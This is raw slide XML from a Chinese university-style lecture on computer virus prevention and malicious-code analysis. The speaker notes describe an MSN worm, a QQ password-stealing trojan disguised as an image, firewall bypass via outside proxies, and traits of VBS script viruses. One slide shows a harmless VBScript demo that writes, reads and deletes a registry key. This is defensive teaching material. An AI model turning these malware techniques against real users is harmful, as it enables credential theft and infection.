                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>系统组件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>分配一个唯一表示它的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>代码，用于对其身份的标示和与其他对象进行区分。</a:t>
            </a:r>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19</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"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a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36866" name="备注占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ActiveX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>控件是用于互联网的很小的程序，有时称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" i="1" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>插件程序。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>它们会允许播放动画，或帮助执行任务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="灯片编号占位符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26</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"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a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46082" name="备注占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>是双向功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>获取对象的内容或向对象插入内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>层叠</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" i="1" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>样式表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>英文全称：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Cascading Style Sheets)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>是一种用来表现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（标准通用标记语言的一个应用）或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（标准通用标记语言的一个子集）等文件样式的计算机语言。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>目前最新版本为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，是能够真正做到网页表现与内容分离的一种样式设计语</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>... </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46083" name="灯片编号占位符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34</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53250" name="备注占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>这就意味着在局域网内任何具有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>浏览权限的用户都可以通过一个外部代理服务器和特定的未被防火墙禁止的端口将信息发送到外部网络，这样，防火墙已形同虚设，不能发挥应有的作用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53251" name="灯片编号占位符 3"/>
          <p:cNvSpPr>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40</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"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a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55298" name="备注占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>BR2002.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>病毒专门袭击微软力推的即时通讯软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>MSN Messenger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。如果在网上聊天时打开对话内容附带的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>BR2002.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>文件，就会受到名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Henpeck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的病毒袭击。用户一开机就会立刻染毒，注册值被更改，并开始从网上自动下载其他有毒文件。同时，电脑还会自动把这一病毒发到通讯簿中的所有名单，扩散到更多的电脑中。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55299" name="灯片编号占位符 3"/>
          <p:cNvSpPr>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41</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="12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a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57346" name="备注占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Trojan.QQPSW.EasyGet.r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>即“好友盗号器变种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>R”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>病毒，这是一个专门窃取密码等个人信息的木马病毒。该病毒是一个可执行程序，只不过采用了图片文件的图标，当用户打开这个“图片”时，会在浏览器中出现一个美女（见图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>5-19</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>），与此同时病毒即刻被释放。当该用户再次登录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的登录密码和其他一些个人信息就会被病毒发送给病毒制造者。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347" name="灯片编号占位符 3"/>
          <p:cNvSpPr>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ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr lvl="0" indent="0" algn="r"/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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32" name="矩形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6416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812800" y="274639"/>
            <a:ext cx="78232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7" name="矩形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12064"/>
            <a:ext cx="109728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673099" y="512064"/>
            <a:ext cx="103632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16" name="矩形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12064"/>
            <a:ext cx="103632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109728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11374903" y="1197789"/>
            <a:ext cx="132763" cy="171288"/>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11578103" y="1350189"/>
            <a:ext cx="132763" cy="171288"/>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11115579" y="1453352"/>
            <a:ext cx="132763" cy="171288"/>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8636000" y="55499"/>
            <a:ext cx="2844800" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:extLst/>
          </a:lstStyle>
          <a:p>
            <a:fld id="{D997B5FA-0921-464F-AAE1-844C04324D75}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/10/21</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="55499"/>
            <a:ext cx="7416800" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:extLst/>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11480800" y="55499"/>
            <a:ext cx="609600" cy="365125"/>
          </a:xfrm>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D997B5FA-0921-464F-AAE1-844C04324D75}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/10/21</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="页脚占位符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565CE74E-AB26-4998-AD42-012C4C1AD07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2378088"/>
            <a:ext cx="10363200" cy="1975104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算机病毒防治</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>技术（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其它恶意代码分析）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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>访问注册表（续）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16388" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1565910"/>
            <a:ext cx="9450070" cy="3688080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dim RegWsh,sReadKey,sPrompt,sFixprompt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Set RegWsh = WScript.CreateObject("WScript.Shell")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RegWsh.RegWrite "HKCU\MyRegKey", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>一级键值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"         '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>创建一级键值</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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sReadKey=RegWsh.RegRead("HKCU\MyRegKey")            '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>读取</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默认</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键值</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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RegWsh.RegDelete “HKCU\MyRegKey”                               '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>删除一级键值</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17410" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1786255"/>
            <a:ext cx="9677400" cy="4451350"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>脚本病毒的特点</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编写简单</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>破坏力大</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>感染力强</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>传播范围大</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>病毒源码容易被获取，变种多</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
